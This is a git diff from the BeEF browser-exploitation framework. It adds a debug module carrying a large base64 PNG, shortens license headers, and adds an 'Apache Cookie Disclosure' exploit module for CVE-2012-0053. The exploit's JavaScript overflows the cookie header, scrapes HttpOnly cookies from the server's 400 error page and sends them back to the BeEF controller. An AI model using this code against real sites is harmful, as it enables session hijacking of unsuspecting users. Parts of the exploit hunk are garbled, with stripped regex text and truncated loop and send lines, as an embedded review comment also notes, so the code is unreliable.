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"); + +}); + diff --git a/modules/debug/test_return_image/config.yaml b/modules/debug/test_return_image/config.yaml new file mode 100644 index 000000000..cf54bd08e --- /dev/null +++ b/modules/debug/test_return_image/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + test_return_image: + enable: true + category: "Debug" + name: "Return Image" + description: "This module will test returning a PNG image as a base64 encoded string. The image should be rendered in the BeEF web interface." + authors: ["bcoles"] + target: + working: ["ALL"] 
diff --git a/modules/debug/test_return_image/module.rb b/modules/debug/test_return_image/module.rb new file mode 100644 index 000000000..893ab7911 --- /dev/null +++ b/modules/debug/test_return_image/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Test_return_image < BeEF::Core::Command + + def post_execute + content = {} + content['image'] = @datastore['image'] + save content + end + +end diff --git a/modules/debug/test_return_long_string/command.js b/modules/debug/test_return_long_string/command.js index da26b067d..1c8f06889 100644 --- a/modules/debug/test_return_long_string/command.js +++ b/modules/debug/test_return_long_string/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var repeat_value = "<%= @repeat_string %>"; diff --git a/modules/debug/test_return_long_string/config.yaml b/modules/debug/test_return_long_string/config.yaml index c44d85390..6451db22a 100644 --- a/modules/debug/test_return_long_string/config.yaml +++ b/modules/debug/test_return_long_string/config.yaml 
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/debug/test_return_long_string/module.rb b/modules/debug/test_return_long_string/module.rb
index 4e1edc68f..77f4b86dc 100644
--- a/modules/debug/test_return_long_string/module.rb
+++ b/modules/debug/test_return_long_string/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Test_return_long_string < BeEF::Core::Command
 
diff --git a/modules/exploits/apache_cookie_disclosure/command.js b/modules/exploits/apache_cookie_disclosure/command.js new file mode 100644 index 000000000..b695e4838 --- /dev/null +++ b/modules/exploits/apache_cookie_disclosure/command.js @@ -0,0 +1,75 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08 + +beef.execute(function() { + + function setCookies (good) { + + var str = ""; + + for (var i=0; i< 819; i++) { + str += "z"; + } + + for (i = 0; i < 10; i++) { + + if (good) { // Expire evil cookie + var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;"; + } else { // Set evil cookie + var cookie = "beef" + i + "=" + str + "; path=/"; + } + document.cookie = cookie; + } + } + + function makeRequest() { + setCookies(); + + function parseCookies () { + var cookie_dict = {}; + + // React on 400 status + if (xhr.readyState === 4 && xhr.status === 400) { + + // Replace newlines and match
 content
+				var content = xhr.responseText.replace(/\r|\n/g,'').match(/
(.+)<\/pre>/);
+				
+				if (content.length) {
+					
+					// Remove "Cookie:" prefix
+					content = content[1].replace("Cookie: ", "");
+					
+					var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);
+					
+					// Add cookies to object
+					for (var i=0; i", <%= @command_id %>, "cookies="+result);
+	
+			}
+		}
+		
+		// Make XHR request
+		var xhr = new XMLHttpRequest();
+		xhr.onreadystatechange = parseCookies;
+		xhr.open("GET", "/", true);
+		xhr.send(null);
+	}
+
+	makeRequest();
+
+});
\ No newline at end of file
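Review bot: In `parseCookies` the result of `.match()` is `null` whenever the 400 response body does not contain the expected block, so the following `if (content.length)` throws a TypeError instead of simply producing nothing; guard it with `if (content && content.length)`. This hunk is also garbled in the page rendering (the `<pre>` literal in the regex and part of the inner `for` loop appear to have been stripped as HTML), so the regex and the loop body could not be checked from what is shown here. The loop counter `i` is declared with `var` inside the `for` header, which in this file's pre-ES6 style still hoists to function scope; a comment noting that `i` is reused across the two loops in `setCookies` would make that intentional.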
diff --git a/modules/exploits/apache_cookie_disclosure/config.yaml b/modules/exploits/apache_cookie_disclosure/config.yaml
new file mode 100644
index 000000000..e8f0fcf47
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        apache_cookies:
+            enable: true
+            category: "Exploits"
+            name: "Apache Cookie Disclosure"
+            description: "This module exploits CVE-2012-0053 in order to read the victim's cookies, even if issued with the HttpOnly attribute. The exploit only works if the target server is running Apache HTTP Server 2.2.0 through 2.2.21."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
diff --git a/modules/exploits/apache_cookie_disclosure/module.rb b/modules/exploits/apache_cookie_disclosure/module.rb
new file mode 100644
index 000000000..22115ed86
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_cookies < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['apache_cookies'] = @datastore['apache_cookies']
+		save content
+	end
+
+end
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/command.js b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
index bfa12a6a6..21b66e983 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/command.js
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
